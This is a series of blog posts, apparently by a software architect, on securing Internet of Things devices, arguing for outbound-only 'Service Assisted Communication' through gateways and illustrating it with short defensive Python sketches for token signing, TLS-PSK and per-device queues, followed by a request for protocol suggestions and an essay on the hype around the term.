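VERIFICATION_KEY = b"provisioned-secret"

def issue_token(device_id: str, ttl_seconds: int = 300) -> str:
    """Token server side: bind a device id to an expiry and sign it."""
    payload = f"{device_id}|{int(time.time()) + ttl_seconds}"
    signature = hmac.new(VERIFICATION_KEY, payload.encode(),
                         hashlib.sha256).hexdigest()
    return f"{payload}|{signature}"

def is_authorized(token: str, device_id: str) -> bool:
    """Verifier side: check origin, integrity, addressee, timeliness."""
    try:
        claimed_id, expiry, signature = token.split("|")
    except ValueError:
        return False
    expected = hmac.new(VERIFICATION_KEY, f"{claimed_id}|{expiry}".encode(),
                        hashlib.sha256).hexdigest()
    return (hmac.compare_digest(signature, expected)
            and claimed_id == device_id
            and int(expiry) > time.time())
```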

The truth, however inconvenient, is that non-interactive special-purpose devices residing in untrusted physical spaces are, without getting external help from services, essentially indefensible when acting as network servers. And this is all just on top of the basic fact that devices that live in untrusted physical space are generally susceptible to physical exploitation and that protecting secrets like key material is generally difficult.

Here's the recipe to eradicate most of the mess I've laid out so far: Devices don't actively listen on the network for inbound connections. Devices act as clients. Mostly.
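In code, that recipe is almost anticlimactic. A sketch of the outbound-only pattern, with the gateway address, credential, and wire framing all invented for illustration:

```python
import socket
import ssl
import time

GATEWAY = ("gateway.example.com", 443)  # invented gateway endpoint

def handle(command: bytes) -> None:
    print("command received:", command)  # application-level dispatch

def run_device() -> None:
    """The device dials out and never listens; commands arrive as
    traffic on the connection the device itself created."""
    context = ssl.create_default_context()  # server-authenticated TLS
    backoff = 1
    while True:
        try:
            with socket.create_connection(GATEWAY) as raw, \
                 context.wrap_socket(raw, server_hostname=GATEWAY[0]) as conn:
                backoff = 1  # healthy connection, reset the backoff
                conn.sendall(b"AUTH device-4711 <token>\n")  # invented framing
                while command := conn.recv(1024):
                    handle(command)
        except OSError:
            time.sleep(backoff)  # reconnect, with exponential backoff
            backoff = min(backoff * 2, 60)
```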

Link vs. Network vs. Transport vs. Application

What I've discussed so far are considerations around the Network and Transport layers (RFC1122, 1.1.3), as I'm making a few general assumptions about connectivity between devices and control and telemetry collection systems, as well as about the connectivity between devices when they're talking in a peer-to-peer fashion.

First, I have so far assumed that devices talk to other systems and devices through a routable (inter-)network infrastructure whose scope goes beyond a single Ethernet hub, WLAN hotspot, Bluetooth PAN, or cellular network tower. Therefore I am also assuming the usage of the only viable routable network protocol suite, the Internet Protocol (v4 and v6), and with it the commonly overlaid transport protocols UDP and TCP.

Second, I have so far assumed that the devices establish a transport-level and then also application-level network relationship with their communication peers, meaning that the device commits resources to accepting, preprocessing, and then maintaining the connection or relationship. That is specifically true for TCP connections (and anything riding on top of it), but is also true for Network-level links like IPSec and session-inducing protocols overlaid over UDP, such as setting up agreements to secure subsequent datagrams as with DTLS.

The reason for assuming a standards-based Network and Transport protocol layer is that everything at the Link Layer (including physical bits on wire or through space) is quite the zoo, and one that I see growing rather than shrinking. The Link Layer will likely continue to be a space of massive proprietary innovation around creative use of radio frequencies, even beyond what we've seen in cellular network technology, where bandwidth has grown from basic GSM's 9.6Kbit/s to today's 100+ MBit/s on LTE in the last 25 years. There are initiatives to leverage the new "white space" spectrum opened up by the shutdown of analog TV, there are services leveraging ISM frequency bands, and there might be well-funded contenders for licensed spectrum emerging that use wholly new stacks. There is also plenty of action on the short-range radio front, specifically around suitable protocols for ultra-low-power devices. And there are obviously also many "wired" transport options over fiber and copper that have made significant progress, will continue to do so, and are essential for device scenarios, often in conjunction with a short-range radio hop for the last few meters/yards. Just as much as it was a losing gamble to specifically bet on TokenRing or ARCnet over Ethernet in the early days of Local Area Networking, it isn't yet clear what to bet on as the winners for the "Internet of Things" in terms of protocols and communication service infrastructures, not even today's mobile network operators.

Betting on a particular link technology for inter-device communication is obviously reasonable for many scenarios where the network is naturally scoped by physical means like radio reach and transmission power, the devices are homogeneous and follow a common and often regulation-imposed standard, and latency requirements are very narrow, bandwidth requirements are very high, or there is no tolerance for failure of intermediaries. Examples for this are in-house device networks for home automation and security, emerging standards for Vehicle-To-Vehicle (V2V) and Vehicle-To-Infrastructure (V2I) communication, or Automatic Dependent Surveillance (ADS, mostly ADS-B) in Air Traffic Control. Those digital radio protocols essentially form peer meshes where everyone listens to everything in range and filters out what they find interesting or addressed specifically at them. And if the use of the frequencies gets particularly busy, coordinated protocols impose time slices on senders.

What such link-layer or direct radio information transfers have generally struggled with is trustworthiness – allow me to repeat: verifiable origin, correct, unaltered, timely, and cannot be abused by unauthorized parties in any fashion.

Of course, by its nature, all radio based communication is vulnerable to jamming and spoofing, which has a grand colorful military history as an offensive or defensive electronic warfare measure along with fitting countermeasures (ECM) and even counter-countermeasures (ECCM). Radio is also, especially when used in an uncoordinated fashion, subject to unintended interference and therefore distortion.

ADS-B, which is meant to replace radar in Air Traffic Control, doesn't even have any security features in its protocol. The stance of the FAA is that they will detect spoofing by triangulation of the signals, meaning they can tell whether a plane that says it's at a particular position is actually there. We should assume they have done their ECM and ECCM homework.

IEEE 1609 for Wireless Access in Vehicular Environments, which is aiming to facilitate ad-hoc V2V and V2I communication, spells out an elaborate scheme to manage, use, and roll X.509 certificates, but relies on the broad distribution of certificate revocation lists to ban once-issued certificates from the system. Vehicles are sold, have their telematics units replaced due to malfunction or crash damage, may be tampered with, or might be stolen. I can see the PKI's generally overly optimistic stance on revocations being challenging at the scale of tens if not hundreds of millions of vehicles, where churn will be very significant. The Online Certificate Status Protocol (OCSP, RFC6960) might help IEEE 1609 deal with the looming CRL caching issues due to size, but it then requires very scalable validation server infrastructure that needs to be reachable whenever two vehicles want to talk, which is also not acceptable.

Local radio link protocols such as Bluetooth, WLAN (802.11x with 802.11i/WPA2-PSK), or Zigbee often assume that participants in a local link network share a common secret, and can keep that secret secret. If the secret leaks, all participants need to be rolled over to a new key. IEEE 802.1X, which is the foundation for the RADIUS authentication and authorization of participants in a network, and the basis of "WPA2 Enterprise", offers a way out of the dilemma of either having to rely on a federated trust scheme that has a hard time dealing with revocations of trust at scale, or on brittle pre-shared keys. 802.1X introduces the notion of an Authentication (and Authorization) server, which is a neutral third party that makes decisions about who gets to access the network.

Unfortunately, many local radio link protocols are not only weak at managing access, they also have a broad history of having weak traffic protection. WLAN's issues got largely cleaned up with WPA2, but there are plenty of examples across radio link protocols where the broken WEP model or equivalent schemes are in active use, or the picture is even worse. Regarding the inherent security of cellular network link-level protection, it ought to be sufficient to look at the recent scolding of politicians in Europe for their absent-minded use of regular GSM/UMTS phones without extra protection measures – and the seemingly obvious result of dead-easy eavesdropping by foreign intelligence services. Ironically, mobile operators make some handsome revenue by selling "private access points" (private APNs) that terminate cellular device data traffic in a VPN, which the customer then tunnels into across the hostile Internet to meet the devices on this fenced-off network, somehow pretending that the mobile network isn't just another operator-managed public network and therefore more trustworthy.

Link-layer protection mechanisms are largely only suitable for keeping unauthorized local participants (i.e. intruders) from getting link-layer data frames up to any higher-level network logic. In link-layer-scoped peer-to-peer network environments, the line between link-layer data frames and what's being propagated to the application is largely blurred, but the previous observation stays true. Even if employed, link-layer security mechanisms are not much help on providing security on the network and transport layers, as many companies are learning the hard way when worms and other exploits sweep through the inside of their triply-firewalled, WPA2 protected, TPM-tied-IPSec-protected networks, or as travelers can learn when they don't have a local firewall up on their machine or use plaintext communication when connecting to the public network at a café, airport, or hotel.

Of course, the insight of public networks not being trustworthy has led many companies interconnecting sites and devices down the path of using virtual private network (VPN) technology. VPN technology, especially when coming in the form of a shiny appliance, makes it very easy to put a network tunnel terminator on either end of a communication path made up of a chain of untrustworthy links and networks. The terminator on either end conveniently surfaces up as a link-layer network adapter. VPN can fuse multiple sites into a single link-layer network, and it is a fantastic technology for that. But like all the other technologies I discussed above, link-layer protection is a zoning mechanism; the security mechanisms that matter to protect digital assets and devices sit at the layers above it. There is no "S" for Security in "VPN". VPN provides secure virtual network cables; it doesn't make the virtual hub they plug into any more secure. Also, in the context of small devices as discussed above, VPN is effectively a non-starter due to its complexity.

What none of these link-layer protection mechanisms help with, including VPN, is to establish any notion of authentication and authorization beyond their immediate scope. A network application that sits on the other end of a TCP socket, where a portion of the route is facilitated by any of these link-layer mechanisms, is and must be oblivious to their existence. What matters for the trustworthiness of the information that travels from the logic on the device to a remote control system not residing on the same network, as well as for commands that travel back up to the device, is solely a fully protected end-to-end communication path spanning networks, where the identity of the parties is established at the application layer, and nothing else. The protection of the route at the transport layer by ways of signature and encryption is established as a service for the application layer, either after the application has given its permission (e.g. certificate validation hooks) or just before the application layer performs an authorization handshake, prior to entering into any conversations. Establishing end-to-end trust is the job of application infrastructure and services, not of networks.

Service Assisted Communication

The findings from this discussion so far can be summarized in a few points:

  • Remote controllable special-purpose devices have a fundamentally different relationship to network services compared to information devices like phones and tablets and require an approach to security that enables exclusive peering with a set of services or a gateway.
  • Devices that take a naïve approach to connectivity by acting like servers and expecting to accept inbound connections pose a number of network-related issues around addressing and naming, and even greater problems around security, exposing themselves to a broad range of attack vectors.
  • Link-layer security measures have varying effectiveness at protecting communication between devices at a single network scope, but none is sufficient to provide a trustworthy communication path between the device and a cloud-based control system or application gateway.
  • The PKI trust model is fundamentally flawed in a variety of ways, including being too static and geared towards long-lived certificates, and it's too optimistic about how well certificates are and can be protected by their bearers. Its use in the TLS context specifically enables the promiscuous client model, which is the opposite of the desired model for special-purpose devices.
  • Approaches to security that provide a reasonable balance between system throughput, scalability, and security protection generally rely on third-party network services that validate user credentials against a central pool, issue security tokens, or validate assurances made by an authority for their continued validity.

The conclusion I draw from these findings is an approach I call "Service Assisted Communication" (SAC). I'm not at all claiming that the principles and techniques are an invention; most are already broadly implemented and used. But I do believe there is value in putting them together here and giving them a name so that they can be effectively juxtaposed with the approaches I've discussed above.

The goal of Service Assisted Communication is to establish trustworthy and bi-directional communication paths between control systems and special-purpose devices that are deployed in untrusted physical space. To that end, the following principles are established:

  • Security trumps all other capabilities. If you can't implement a capability securely, you must not implement it. You identify threats and mitigate them, or you don't ship product. If you employ a mitigation without knowing what the threat is, you don't ship product, either.
  • Devices do not accept unsolicited network information. All connections and routes are established in an outbound-only fashion.
  • Devices generally only connect to or establish routes to well-known services that they are peered with. In case they need to feed information to or receive commands from a multitude of services, devices are peered with a gateway that takes care of routing information downstream and of ensuring that commands are only accepted from authorized parties before routing them to the device.
  • The communication path between device and service or device and gateway is secured at the application protocol layer, mutually authenticating the device to the service or gateway and vice versa. Device applications do not trust the link-layer network.
  • System-level authorization and authentication must be based on per-device identities, and access credentials and permissions must be near-instantly revocable in case of device abuse.
  • Bi-directional communication for devices that are connected sporadically due to power or connectivity concerns may be facilitated by holding commands and notifications for the devices until they connect to pick them up.
  • Application payload data may be separately secured for protected transit through gateways to a particular service.

The manifestation of these principles is the simple diagram on the right. Devices generally live in local networks with limited scope. Those networks are reasonably secured against intrusion with link-layer access control mechanisms, to prevent low-level brute-force attacks such as flooding them with packets, and, for that purpose, also employ traffic protection. The devices will obviously observe link-layer traffic in order to triage out solicited traffic, but they do not react to unsolicited connection attempts that would cause any sort of work or resource consumption from the network layer on up.

All connections to and from the device are made via, or at least facilitated via, a gateway, unless the device is peered with a single service, in which case that service takes on the role of the gateway. Occasional peer-to-peer connections are acceptable, but only if the gateway permits them and facilitates a secure handshake. The gateway that the device peers with may live on the local network and thus govern local connections. Towards external networks, the local gateway acts as a bridge towards the devices and is itself connected by the same set of principles discussed here, meaning it acts like a device connected to an external gateway.

When the device connects to an external gateway, it does so by creating and maintaining an outbound TCP socket across a network address translation boundary (RFC2663), or by establishing a bi-directional UDP route, potentially utilizing the Session Traversal Utilities for NAT (STUN, RFC5389). Even though I shouldn't have to, I will explicitly note that the WebSocket protocol (RFC6455) rides on top of TCP and gets its bi-directional flow capability from there. There's quite a bit of bizarre information on the Interwebs on how the WebSocket protocol somehow newly and uniquely enables bi-directional communication, which is obviously rubbish. What it does allow is port sharing, so that WebSocket-aware protocols can share the standard HTTP/S ports 80 (RFC2616) and 443 (RFC2818) with regular web traffic and also piggyback on the respective firewall and proxy permissions for web traffic. The in-progress HTTP 2.0 specification will expand this capability further.

By only relying on outbound connectivity, the NAT/Firewall device at the edge of the local network will never have to be opened up for any unsolicited inbound traffic.

The outbound connection or route is maintained by either client or gateway in such a fashion that intermediaries such as NATs will not drop it due to inactivity. That means that either side might send some form of a keep-alive packet periodically or, even better, periodically sends a payload packet that doubles as a keep-alive packet. Under most circumstances it will be preferable for the device to send the keep-alive traffic, as it is the originator of the connection or route and can and should react to a failure by establishing a new one.

As TCP connections are endpoint concepts, a connection will only be declared dead if the route is considered collapsed, and the detection of this fact requires packet flow. A device and its gateway may therefore sit idle for quite a while believing that the route and connection are still intact, before the lack of acknowledgement of the next packet proves that assumption incorrect. There is a tricky tradeoff decision to be made here. So-called carrier-grade NATs (or Large Scale NATs) employed by mobile network operators permit very long periods of connection inactivity, and mobile devices that get direct IPv6 address allocations are not forced through a NAT, at all. The push notification mechanisms employed by all popular smartphone platforms utilize this to dramatically reduce the power consumption of the devices by maintaining the route very infrequently, once every 20 minutes or more, and therefore being able to largely remain in sleep mode, with most systems turned off, while idly waiting for payload traffic. The downside of infrequent keep-alive traffic is that the time to detection of a bad route is, in the worst case, as long as the keep-alive interval. Ultimately it's a tradeoff between battery-power and traffic-volume cost (on metered subscriptions) and acceptable latency for commands and notifications in case of failures. The device can obviously be proactive in detecting potential issues and abandon the connection and create a new one when, for instance, it hops to a different network or when it recovers from signal loss.
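The whole tradeoff collapses into a single constant in code. A sketch, with the interval value picked arbitrarily to mirror the smartphone-platform behavior described above:

```python
import socket
import time

# One knob: a longer interval saves battery and metered traffic, but
# the worst-case time to notice a collapsed route is one full interval.
KEEPALIVE_INTERVAL = 20 * 60  # seconds, invented value

def keep_route_alive(conn: socket.socket, next_payload) -> None:
    """Send payload if there is any; otherwise send a bare keep-alive.
    A send on a dead route eventually raises OSError, which is the
    caller's cue to abandon the connection and dial a new one."""
    while True:
        payload = next_payload()            # returns bytes or None
        conn.sendall(payload or b"PING\n")  # payload doubles as keep-alive
        time.sleep(KEEPALIVE_INTERVAL)
```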

The connection from the device to the gateway is protected end-to-end, ignoring any underlying link-level protection measures. The gateway authenticates with the device and the device authenticates with the gateway, so neither is anonymous towards the other. In the simplest case, this can occur through the exchange of some proof of possession of a previously shared key. It can also happen via a (heavy) X.509 certificate exchange as performed by TLS, or a combination of a TLS handshake with server authentication where the device subsequently supplies credentials or an authorization token at the application level. The privacy and integrity protection of the route is also established end-to-end, ideally as a byproduct of the authentication handshake, so that a potential attacker cannot waste cryptographic resources on either side without producing proof of authorization.

The current best option is a combination of the simple authentication model of SSH (pre-shared keys) with the established foundation of TLS. Luckily, this exists in the form of TLS-PSK (RFC4279), which enables pre-shared keys as credentials and eliminates the weight of the X.509 certificate handling and wire-level exchange. The pre-shared key can be used as the session key proper (in the simplest case) or can be used as a credential and basis for a Diffie-Hellman session key exchange. The result is a fairly lightweight mechanism that can build on a narrow set of algorithms (like AES-256, SHA-256) on compute- and library-footprint-constrained devices, and is still compatible with all application layer protocols that rely on TLS.
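For what it's worth, this is no longer exotic in mainstream stacks; recent Python (3.13 and later), for example, exposes TLS-PSK when the underlying OpenSSL build supports it. A client-side sketch, with the gateway endpoint, identity, key, and framing all invented for illustration:

```python
import socket
import ssl

GATEWAY = ("gateway.example.com", 443)  # invented endpoint
PSK_IDENTITY = "device-4711"            # provisioned at pairing time
PSK = bytes.fromhex("00112233445566778899aabbccddeeff")  # invented key

context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False        # no certificates involved, so
context.verify_mode = ssl.CERT_NONE   # trust rests on the key, not a CA
context.maximum_version = ssl.TLSVersion.TLSv1_2  # RFC 4279 targets TLS <= 1.2
context.set_ciphers("PSK")            # restrict to pre-shared-key suites
context.set_psk_client_callback(lambda hint: (PSK_IDENTITY, PSK))

with socket.create_connection(GATEWAY) as raw:
    with context.wrap_socket(raw) as conn:
        # No X.509 exchange took place; both parties proved possession
        # of the provisioned key during the handshake itself.
        conn.sendall(b"TELEMETRY 21.5\n")  # invented framing
```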

The result of the application-level handshake is a secure peer connection between the device and a gateway that only the gateway can feed. The gateway can, in turn, now provide one or even several different APIs and protocol surfaces that can be translated to the primary bi-directional protocol used by the device. The gateway also provides the device with a stable address in the form of an address projected onto the gateway's protocol surface, and therefore also with location transparency and location hiding.

The device might speak only AMQP or MQTT or some proprietary protocol, and yet have a full HTTP/REST interface projection at the gateway, with the gateway taking care of the required translation and also of enrichment, where responses from the device can be augmented with reference data, for instance. The device can connect from any context and can even switch contexts, yet its projection into the gateway and its address remain completely stable. The gateway can also be federated with external identity and authorization services, so that only callers acting on behalf of particular users or systems can invoke particular device functions. The gateway therefore provides basic network defense, API virtualization, and authorization services, all combined in one.

The gateway model gets even better when it includes or is based on an intermediary messaging infrastructure that provides a scalable queuing model for both ingress and egress traffic.

Without this intermediary infrastructure, the gateway approach would still suffer from the issue that devices must be online and available to receive commands and notifications when the control system sends them. With a per-device queue or per-device subscription on a publish/subscribe infrastructure, the control system can drop a command at any time, and the device can pick it up whenever it's online. If the queue provides time-to-live expiration alongside a dead-lettering mechanism for such expired messages, the control system can also know immediately when a message has not been picked up and processed by the device in the allotted time.

The queue also ensures that the device can never be overtaxed with commands or notifications. The device maintains one connection into the gateway and fetches commands and notifications on its own schedule. Any backlog forms in the gateway and can be handled there accordingly. The gateway can start rejecting commands on the device's behalf if the backlog grows beyond a threshold or the cited expiration mechanism kicks in, and the control system gets notified that the command cannot be processed at the moment.
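A hedged sketch of that per-device queue, with the backlog limit invented; a real system would sit on a brokered messaging product, but the mechanics are these:

```python
import time
from collections import deque

MAX_BACKLOG = 100  # invented threshold at which the gateway rejects

class DeviceQueue:
    """Per-device command queue held at the gateway."""

    def __init__(self) -> None:
        self.pending = deque()
        self.dead_letter = []  # expired commands surface here

    def send(self, command: bytes, ttl_seconds: float) -> bool:
        """Control-system side: drop a command at any time; returns
        False when the gateway rejects on the device's behalf."""
        if len(self.pending) >= MAX_BACKLOG:
            return False
        self.pending.append((command, time.time() + ttl_seconds))
        return True

    def fetch(self) -> bytes | None:
        """Device side: pick up commands on its own schedule; anything
        past its time-to-live is dead-lettered, so the control system
        learns that it was never picked up and processed in time."""
        while self.pending:
            command, expires_at = self.pending.popleft()
            if time.time() < expires_at:
                return command
            self.dead_letter.append(command)
        return None
```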

On the ingress side (from the gateway perspective), using a queue has the same kind of advantages for the backend systems. If devices are connected at scale and input from the devices comes in bursts or has significant spikes around certain hours of the day, as with telematics systems in passenger cars during rush hour, having the gateway deal with the traffic spikes is a great idea to keep the backend system robust. The ingestion queue also allows telemetry and other data to be held temporarily when the backend systems or their dependencies are taken down for service or suffer from service degradation of any kind. You can find more on the usage of brokered messaging infrastructures for these scenarios in an MSDN Magazine article I wrote a year back.

Conclusion

An "Internet of Things" where devices reside in unprotected physical space and where they can interact with the physical world is a very scary proposition if we solely rely on naïve link and network-level approaches to connectivity and security, which are the two deeply interwoven core aspects of the "I" in "IoT". Special-purpose devices don't benefit from constant human oversight as phones and tablets and PCs do, and we struggle even to keep those secure. We have to do a better job, as an industry, to keep the devices secure that we want to install in the world without constant supervision.

"Trustworthy communication" means that information exchanged between devices and control systems is of verifiable origin, correct, unaltered, timely, and cannot be abused by unauthorized parties in any fashion. Such trust cannot be established at scale without employing systems that are designed for the purpose and keep the "bad guys" out. If we want smarter devices around us that helping to improve our lives and are yet power efficient and affordable, we can't leave them alone in untrustworthy physical space taking care of their own defenses, because they won't be able to.

Does this mean that the refrigerator cannot talk to the laundry washing machine on the local network? Yes, that is precisely what that means. Aside from that idea being somewhat ludicrous, how else does the washing machine defend itself from a malicious refrigerator if not by a gateway that can? Devices that are unrelated and are not part of a deeply integrated system meet where they ought to meet: on the open Internet, not "behind the firewall".

Categories: Architecture | Technology

I have an immediate job opening for an open standard or multivendor transport layer security protocol that

  1. does NOT rely on or tie into PKI and especially
  2. doesn’t require the exchange of X.509 certificates for an initial handshake,
  3. supports session resumption, and
  4. can be used with a minimal algorithm suite that is microcontroller friendly (AES-256, SHA-256, ECDH).

Because

  1. For “service assisted connectivity” where a device relies on a gateway to help with any defensive measures from the network layer on up, the device ought to be paired with exactly one (cluster of) gateway(s). Also, an unobserved device should not pose any threat to a network that it is deployed into (see the fridges abused as spam bots or local spies) and therefore outbound communication should be funneled through the gateway as well. TLS/PKI specifically enables promiscuous clients that happily establish sessions with any “trustworthy” (per CA) server, often under direction of an interactive user. Here, I want to pair a device with a gateway, meaning that the peers are known a priori and thus
  2. the certificate exchange is 3-6kb of extra baggage that’s pure overhead if the parties have an existing and well-known peer relationship.
  3. Session resumption is required because devices will get disconnected while roaming and on radio or will temporarily opt to turn off the radio, which might tear sockets. It’s also required because the initial key exchange is computationally very expensive and imposes significant latency overhead due to the extra roundtrips.
  4. Microcontroller based devices are often very constrained with regards to program storage and can’t lug a whole litany of crypto algorithms around. So the protocol must allow for a compliant implementation to only support a small set of algos that can be implemented on MCUs in firmware or in silicon.

Now, TLS 1.2 with a minimal crypto suite profile might actually be suitable if one could cheat around the whole cert exchange and supply clients with an RFC5077 session resumption ticket out-of-band in such a way that it effectively acts as a long-term connection authN/Z token. Alas, you can't. SSH is also a candidate but it doesn't have session resumption.

Ideas? Suggestions? clemensv@microsoft.com or Twitter @clemensv

Categories: Technology

Terminology that loosely ring-fences a group of related technologies is often very helpful in engineering discussions – until the hype machine gets a hold of them. “Cloud” is a fairly obvious victim of this. Initially conceived to describe large-scale, highly-available, geo-redundant, and professionally-managed Internet-based services that are “up there and far away” without the user knowing of or caring about particular machines or even datacenter locations, it’s now come so far that a hard drive manufacturer sells a network attached drive as a “cloud” that allows storing content “safely at home”. Thank you very much. For “cloud”, the dilution of the usefulness of the term took probably a few years and included milestones like the labeling of datacenter virtualization as “private cloud” and more recently the broad relabeling of practically all managed hosting services or even outsourced data center operations as “cloud”.

The term “Internet of Things” is being diluted into near nonsense even faster. It was initially meant to describe, as a sort of visionary lighthouse, the interconnection of sensors and physical devices of all kinds into a network much like the Internet, in order to allow for gaining new insights about and allow new automated interaction with the physical world – juxtaposed with today’s Internet that is primarily oriented towards human-machine interaction. What we’ve ended up with in today’s discussions is that the term has been made synonymous with what I have started to call “Thing on the Internet”.

A refrigerator with a display and a built-in browser that allows browsing the nearest supermarket’s special offers, including the ability to order them, may be cool (at least on the inside, even when the gadget novelty has worn off), but it’s conceptually and even technically not different from a tablet or phone – and that would even be true if it had a bar code scanner with which one could obsessively check the milk and margarine in and out (in which case professional help may be in order). The same is true for the city guide or weather information functions in a fancy connected car multimedia system, or today’s top news headline being burnt into a slice of bread by the mythical Internet toaster. Those things are things on the Internet. They’re the long-oxidized fuel of the 1990s dotcom boom and bust. Technically and conceptually boring. Islands. Solved problems.

The challenge is elsewhere.

“Internet of Things” ought to be about internetworked things, about (responsibly) gathering and distributing information from and about the physical world, about temperature and pollution, about heartbeats and blood pressure, about humidity and mineralization, about voltages and amperes, about liquid and gas pressures and volumes, about seismic activity and tides, about velocity, acceleration, and altitude – it’s about learning about the world’s circumstances, drawing conclusions, and then acting on those conclusions, often again affecting the physical world. That may include the “Smart TV”, but not today’s.

The “Internet of Things” isn’t really about things. It’s about systems. It’s about gathering information in certain contexts or even finding out about new contexts and then improving the system as a result. You could, for instance, run a bus line from a suburb into town on a sleepy Sunday morning with a promise of no passenger ever waiting for more than, say, 10 minutes, instead of running on a fixed schedule of every 60-90 minutes on that morning, and make public transport vastly more attractive, if the bus system only knew where the prospective passengers were and could dynamically dispatch and route a few buses along a loose route.

“Let’s make an app” is today’s knee-jerk approach to realizing such an idea. I would consider it fair if someone were to call that discriminatory and elitist, as it excludes people too poor to afford a $200 pocket computer with a service plan, as well as many children, and the very many elderly people who went through their lives without always-on Internet and have no interest in dealing with it now.

It’s also an unnecessary complication, because the bus stop itself can, with a fairly simple (thermographic) camera setup, tell the system whether anyone’s waiting, and also easily tell whether they’re actually staying around or end up wandering away, and the system can feed back the currently projected arrival time to a display at the bus stop – which can be reasonably protected against vandalism attempts by shock and glass-break sensors triggering alarms, as well as by remote-recording any such incidents with the camera. The thermographic camera won’t tell us which bus line the prospective passenger wants to take, but a simple button might. It also helps to easily tell when a rambunctious 10-year-old pushes all the buttons and runs away.

Projecting the bus’ arrival time and planning the optimal route can be aided by city-supplied traffic information collected by induction loops and camera systems in streets and on traffic lights at crossings, which can yield statistical projections by day and time of day, as well as ad-hoc data about current traffic disturbances or diversions and about street conditions due to rain, ice, or fog – the latter also supplied by the buses themselves (‘floating car data’) as they’re moving along in traffic. It’s also informed by the bus driver’s shift information, the legal and work-agreement-based needs for rest times during the day, as well as the bus’ fuel or battery level, or other operational health parameters that may require a stop at a depot.

All that data informs the computation of the optimal route, which is provided to the bus stops, to the bus (-driver), and to those lucky passengers who can afford a $200 pocket computer with a service plan and have asked to be notified when it’s time to leave the corner coffee shop in order to catch the next bus in comfort. What we have in this scenario is a set of bidirectional communication paths from and to bus, bus driver, bus stop, and passengers, aided by sensor data in streets and lights, all connecting up to an interconnected set of control and information systems making decisions based on a combination of current input and past experience. Such systems need to ingest, process, and distribute information from and to tens of thousands of sources at the municipal level, and for them to be economically viable for operators and vendors, they need to scale across thousands of municipalities. And the scenario I just laid out here is just one slice out of one particular vertical.

Those systems are hard, complex, and pose challenges in terms of system capacity, scalability, reliability, and – towering above all – security that are at the cutting edge or often still beyond the combined manufacturing (and IT) industry’s current abilities and maturity.

“Internet of Things” is not about having a little Arduino box fetch the TV schedule and sounding an alarm when your favorite show is coming on.

That is cool, but it’s just a thing on the Internet.

Categories: Architecture